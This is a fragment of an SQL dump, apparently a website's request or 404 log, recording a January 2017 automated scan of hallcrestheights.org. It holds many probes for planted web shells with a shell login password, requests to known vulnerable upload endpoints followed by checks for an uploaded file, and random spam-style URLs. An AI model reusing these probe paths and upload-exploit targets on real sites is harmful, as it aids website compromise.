00:00:00'),(4560,'http://hallcrestheights.org//google-assist.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:36','0000-00-00 00:00:00'),(4561,'http://hallcrestheights.org//images/google-assist.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:42','0000-00-00 00:00:00'),(4562,'http://hallcrestheights.org//images/robots.txt.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:45','0000-00-00 00:00:00'),(4563,'http://hallcrestheights.org//elements.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:51','0000-00-00 00:00:00'),(4564,'http://hallcrestheights.org//xmlsrpc.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:54','0000-00-00 00:00:00'),(4565,'http://hallcrestheights.org//wp-cache.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:57','0000-00-00 00:00:00'),(4566,'http://hallcrestheights.org//images/404.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:59','0000-00-00 00:00:00'),(4567,'http://hallcrestheights.org//images/head.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:06','0000-00-00 00:00:00'),(4568,'http://hallcrestheights.org//cache/support.php?z3=azRBa1ltLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:09','0000-00-00 00:00:00'),(4569,'http://hallcrestheights.org//RoseLeif.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:13','0000-00-00 00:00:00'),(4570,'http://hallcrestheights.org//Abbrevsprl.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:17','0000-00-00 00:00:00'),(4571,'http://hallcrestheights.org//show.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:23','0000-00-00 00:00:00'),(4572,'http://hallcrestheights.org//images/defau1t.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:28','0000-00-00 00:00:00'),(4573,'http://hallcrestheights.org//cli/40dd1d.php?z3=azRBa1ltLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:32','0000-00-00 00:00:00'),(4574,'http://hallcrestheights.org//infos.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:37','0000-00-00 00:00:00'),(4575,'http://hallcrestheights.org//cache/defau1t.php?z3=azRBa1ltLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:42','0000-00-00 00:00:00'),(4576,'http://hallcrestheights.org//bookmark.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:46','0000-00-00 00:00:00'),(4577,'http://hallcrestheights.org//configbak.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:30:53','0000-00-00 00:00:00'),(4578,'http://hallcrestheights.org//wp-data.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:11','0000-00-00 00:00:00'),(4579,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:15','0000-00-00 00:00:00'),(4580,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:25','0000-00-00 00:00:00'),(4581,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:36','0000-00-00 00:00:00'),(4582,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:39','0000-00-00 00:00:00'),(4583,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:45','0000-00-00 00:00:00'),(4584,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:48','0000-00-00 00:00:00'),(4585,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:51','0000-00-00 00:00:00'),(4586,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:31:56','0000-00-00 00:00:00'),(4587,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:32:00','0000-00-00 00:00:00'),(4588,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=azRBa1ltLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:32:06','0000-00-00 00:00:00'),(4589,'http://hallcrestheights.org//cache/list.php?z3=azRBa1ltLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:32:12','0000-00-00 00:00:00'),(4590,'http://hallcrestheights.org//license.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:17','0000-00-00 00:00:00'),(4591,'http://hallcrestheights.org//tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:19','0000-00-00 00:00:00'),(4592,'http://hallcrestheights.org//up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-01-12 20:32:20','0000-00-00 00:00:00'),(4593,'http://hallcrestheights.org//m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:21','0000-00-00 00:00:00'),(4594,'http://hallcrestheights.org//ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:22','0000-00-00 00:00:00'),(4595,'http://hallcrestheights.org//tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:23','0000-00-00 00:00:00'),(4596,'http://hallcrestheights.org//media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:24','0000-00-00 00:00:00'),(4597,'http://hallcrestheights.org//media/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:26','0000-00-00 00:00:00'),(4598,'http://hallcrestheights.org//css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:27','0000-00-00 00:00:00'),(4599,'http://hallcrestheights.org//nktt.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:28','0000-00-00 00:00:00'),(4600,'http://hallcrestheights.org//zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:31','0000-00-00 00:00:00'),(4601,'http://hallcrestheights.org//u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:32','0000-00-00 00:00:00'),(4602,'http://hallcrestheights.org//ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:33','0000-00-00 00:00:00'),(4603,'http://hallcrestheights.org//libraries/joomla/web.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:35','0000-00-00 00:00:00'),(4604,'http://hallcrestheights.org//active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:36','0000-00-00 00:00:00'),(4605,'http://hallcrestheights.org//images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:39','0000-00-00 00:00:00'),(4606,'http://hallcrestheights.org//images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:41','0000-00-00 00:00:00'),(4607,'http://hallcrestheights.org//images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:46','0000-00-00 00:00:00'),(4608,'http://hallcrestheights.org//images/logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:50','0000-00-00 00:00:00'),(4609,'http://hallcrestheights.org//images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:51','0000-00-00 00:00:00'),(4610,'http://hallcrestheights.org//help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',43,0,'2017-01-12 20:32:53','0000-00-00 00:00:00'),(4611,'http://hallcrestheights.org//libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:54','0000-00-00 00:00:00'),(4612,'http://hallcrestheights.org//libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:32:57','0000-00-00 00:00:00'),(4613,'http://hallcrestheights.org//tmp/pz.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:32:59','0000-00-00 00:00:00'),(4614,'http://hallcrestheights.org//go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:02','0000-00-00 00:00:00'),(4615,'http://hallcrestheights.org//wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:05','0000-00-00 00:00:00'),(4616,'http://hallcrestheights.org//images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:07','0000-00-00 00:00:00'),(4617,'http://hallcrestheights.org//libraries/joomla/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:09','0000-00-00 00:00:00'),(4618,'http://hallcrestheights.org//images/stories/xsamxadoo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:10','0000-00-00 00:00:00'),(4619,'http://hallcrestheights.org//tmp/petx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:11','0000-00-00 00:00:00'),(4620,'http://hallcrestheights.org//tmp/bogel.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:12','0000-00-00 00:00:00'),(4621,'http://hallcrestheights.org//images/stories/0d4y.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:13','0000-00-00 00:00:00'),(4622,'http://hallcrestheights.org//libraries/joomla/wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:15','0000-00-00 00:00:00'),(4623,'http://hallcrestheights.org//cache/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:17','0000-00-00 00:00:00'),(4624,'http://hallcrestheights.org//images/stories/a.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:21','0000-00-00 00:00:00'),(4625,'http://hallcrestheights.org//b1.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:22','0000-00-00 00:00:00'),(4626,'http://hallcrestheights.org//mide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:25','0000-00-00 00:00:00'),(4627,'http://hallcrestheights.org//wp-content/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:29','0000-00-00 00:00:00'),(4628,'http://hallcrestheights.org//images/stories/shell.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:32','0000-00-00 00:00:00'),(4629,'http://hallcrestheights.org//images/stories/filemga.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:36','0000-00-00 00:00:00'),(4630,'http://hallcrestheights.org//images/stories/0day.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:38','0000-00-00 00:00:00'),(4631,'http://hallcrestheights.org//default_component.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:42','0000-00-00 00:00:00'),(4632,'http://hallcrestheights.org//images/w0rm.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:46','0000-00-00 00:00:00'),(4633,'http://hallcrestheights.org//images/sym.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:48','0000-00-00 00:00:00'),(4634,'http://hallcrestheights.org//images/wp-mail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:49','0000-00-00 00:00:00'),(4635,'http://hallcrestheights.org//media/jmail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:52','0000-00-00 00:00:00'),(4636,'http://hallcrestheights.org//images/stories/webroot.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:53','0000-00-00 00:00:00'),(4637,'http://hallcrestheights.org//bin/logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:55','0000-00-00 00:00:00'),(4638,'http://hallcrestheights.org//images/upa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:56','0000-00-00 00:00:00'),(4639,'http://hallcrestheights.org//images/stories/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:33:57','0000-00-00 00:00:00'),(4640,'http://hallcrestheights.org//images/stories/ali.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:33:59','0000-00-00 00:00:00'),(4641,'http://hallcrestheights.org//hh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:34:03','0000-00-00 00:00:00'),(4642,'http://hallcrestheights.org//images/stories/gh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:34:05','0000-00-00 00:00:00'),(4643,'http://hallcrestheights.org//tmp/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:34:06','0000-00-00 00:00:00'),(4644,'http://hallcrestheights.org//images/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:34:08','0000-00-00 00:00:00'),(4645,'http://hallcrestheights.org//images/stories/gass.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',22,0,'2017-01-12 20:34:09','0000-00-00 00:00:00'),(4646,'http://hallcrestheights.org//up14.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:34:10','0000-00-00 00:00:00'),(4647,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/udd.php','',32,0,'2017-01-12 20:34:14','0000-00-00 00:00:00'),(4648,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/k4AkYm.php',NULL,'','',1,0,'2017-01-12 20:34:16','0000-00-00 00:00:00'),(4649,'http://hallcrestheights.org//wp-admin/admin-ajax.php',NULL,'http://hallcrestheights.org//wp-admin/admin-ajax.php','',29,0,'2017-01-12 20:34:19','0000-00-00 00:00:00'),(4650,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/k4AkYm.php',NULL,'','',1,0,'2017-01-12 20:34:23','0000-00-00 00:00:00'),(4651,'http://hallcrestheights.org//wp-content/uploads/k4AkYm.php',NULL,'','',1,0,'2017-01-12 20:34:27','0000-00-00 00:00:00'),(4652,'http://hallcrestheights.org//uploadify/uploadify.php?folder=/',NULL,'http://hallcrestheights.org//uploadify/uploadify.php?folder=/','',23,0,'2017-01-12 20:34:29','0000-00-00 00:00:00'),(4653,'http://hallcrestheights.org//k4AkYm.php',NULL,'','',1,0,'2017-01-12 20:34:30','0000-00-00 00:00:00'),(4654,'http://hallcrestheights.org//sites/all/libraries/elfinder/php/connector.minimal.php',NULL,'http://hallcrestheights.org//sites/all/libraries/elfinder/php/connector.minimal.php','',23,0,'2017-01-12 20:34:34','0000-00-00 00:00:00'),(4655,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/k4AkYm.php',NULL,'','',1,0,'2017-01-12 20:34:36','0000-00-00 00:00:00'),(4656,'http://hallcrestheights.org//wp-installation.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',23,0,'2017-01-12 20:34:37','0000-00-00 00:00:00'),(4657,'http://hallcrestheights.org//media/mass.php',NULL,'','',25,0,'2017-01-12 20:34:39','0000-00-00 00:00:00'),(4658,'http://hallcrestheights.org//E.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-01-12 20:34:40','0000-00-00 00:00:00'),(4659,'http://hallcrestheights.org//Jijle3.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:34:43','0000-00-00 00:00:00'),(4660,'http://hallcrestheights.org//xup.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-01-12 20:34:44','0000-00-00 00:00:00'),(4661,'http://hallcrestheights.org//zebda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-01-12 20:34:46','0000-00-00 00:00:00'),(4662,'http://hallcrestheights.org//kk.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',25,0,'2017-01-12 20:34:51','0000-00-00 00:00:00'),(4663,'http://hallcrestheights.org//wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',24,0,'2017-01-12 20:34:52','0000-00-00 00:00:00'),(4664,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj/yldpija-amdu-i20162637-rtaen-k60390-pggwtd-vlxt.htm',NULL,'','',1,0,'2017-01-12 20:36:03','0000-00-00 00:00:00'),(4665,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr/k14899-glnik-i20162629-ghhm-bbxpges-mrcaizt/',NULL,'','',1,0,'2017-01-12 20:48:41','0000-00-00 00:00:00'),(4666,'http://www.hallcrestheights.org/fadl-ajfnlgf-i20162634-k21762-pcvwg/myhdec-wxbdeud-kovfiibp-tquhzxc-hhrmxagf.htm',NULL,'','',1,0,'2017-01-12 20:54:37','0000-00-00 00:00:00'),(4667,'http://www.hallcrestheights.org/oiyizg-olrcmwfb/snop-i20162633-dgfnh-k7639-skrl/',NULL,'','',1,0,'2017-01-12 21:16:33','0000-00-00 00:00:00'),(4668,'http://www.hallcrestheights.org/tkuyk-fjdnjj-i20162634-bucyu/k53707-paja-ylrlwfv-dyruqpkl-sdefhxdf/',NULL,'','',1,0,'2017-01-12 21:31:50','0000-00-00 00:00:00'),(4669,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz/qdwkvum-k49355-zbsai/',NULL,'','',1,0,'2017-01-12 21:42:14','0000-00-00 00:00:00'),(4670,'http://www.hallcrestheights.org/k18790-gnfznxvj-xpalt/itjshkyj-i20162628-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-12 21:45:58','0000-00-00 00:00:00'),(4671,'http://www.hallcrestheights.org/gnfzn-xvjx-k16814-palt-itjshkyj/yldpijaa-i20162633-mdurta-enpgg-wtdvlx-tdqku-nfglqrh-zyonxfe-qnzs.htm',NULL,'','',1,0,'2017-01-12 21:47:27','0000-00-00 00:00:00'),(4672,'http://www.hallcrestheights.org/ixnmueah-whioz-i20162628-hjxbnwpg-eyooayi/kuks-szqce-baqdom-k19290-ytni-holbdent-afymluze-xtlfgg.htm',NULL,'','',1,0,'2017-01-12 21:57:59','0000-00-00 00:00:00'),(4673,'http://www.hallcrestheights.org/k50470-upttmnbe-i20162631-atgrb/nqcdcncx-rdhcpgz-zdll.htm',NULL,'','',1,0,'2017-01-12 22:08:40','0000-00-00 00:00:00'),(4674,'http://www.hallcrestheights.org/i20162634-ryvh-rhmqtyy/k21362-sllge-ajanpd-mefnxhq-fhjdyhao.htm',NULL,'','',1,0,'2017-01-12 22:12:56','0000-00-00 00:00:00'),(4675,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil/i20162628-uourxiv-lbtr-hnnmt-k17590-qzkowt.htm',NULL,'','',1,0,'2017-01-12 22:18:25','0000-00-00 00:00:00'),(4676,'http://www.hallcrestheights.org/inquiry/index.html',NULL,'','',11,0,'2017-01-12 22:28:21','0000-00-00 00:00:00'),(4677,'http://www.hallcrestheights.org/i20162632-ixnmu-eahw-k58914-hioz/hjxbnwpg-eyooayik-uksszq-cebaq-domytn.htm',NULL,'','',2,0,'2017-01-12 22:38:39','0000-00-00 00:00:00'),(4678,'http://www.hallcrestheights.org/i20162632-htxwhy-krsvsvhu-dykb/k50139-qxdos-fiet-yuaixnr-bdggsaa-rhefs/',NULL,'','',1,0,'2017-01-12 22:48:51','0000-00-00 00:00:00'),(4679,'http://hallcrestheights.org/images/lol.php',NULL,'','',1,0,'2017-01-12 22:49:21','0000-00-00 00:00:00'),(4680,'http://hallcrestheights.org/images/css.php',NULL,'','',1,0,'2017-01-12 22:49:22','0000-00-00 00:00:00'),(4681,'http://hallcrestheights.org/images/check.php',NULL,'','',1,0,'2017-01-12 22:49:24','0000-00-00 00:00:00'),(4682,'http://www.hallcrestheights.org/i20162632-jglet-kymd/k57914-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-01-12 22:59:07','0000-00-00 00:00:00'),(4683,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz-qdwkvum-zbsai/imjzf-ozgdvdd-qjvd-obknlykc-onedw-jmaxev-ortbz-k6455-qsaxidi/',NULL,'','',1,0,'2017-01-12 23:19:44','0000-00-00 00:00:00'),(4684,'http://www.hallcrestheights.org/k61090-ryvhrhmq-tyysl/i20162637-lgeajanp-dmefnxh-qfhj.htm',NULL,'','',1,0,'2017-01-12 23:31:54','0000-00-00 00:00:00'),(4685,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq-cmckf/rdtf-i20162633-kgpvbch-siwhork-lvzrt-jrsyoa-ayfw-gdxskmyu-k8039-kcmbqrmk/',NULL,'','',1,0,'2017-01-12 23:34:41','0000-00-00 00:00:00'),(4686,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo/qxifgxuh-k634-xptvuhmi-i20162637-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-12 23:44:35','0000-00-00 00:00:00'),(4687,'http://www.hallcrestheights.org/i20162628-mrcqgbei-k19090-fuwgr-abtnwyrq-semgwko/whme-mxgku-cybnpz-kicv-ejxkulzj.htm',NULL,'','',1,0,'2017-01-12 23:49:50','0000-00-00 00:00:00'),(4688,'http://www.hallcrestheights.org/nfrkopdo-i20162633-bbum/golzesr-k18791-kwtzqtqb/',NULL,'','',1,0,'2017-01-12 23:59:59','0000-00-00 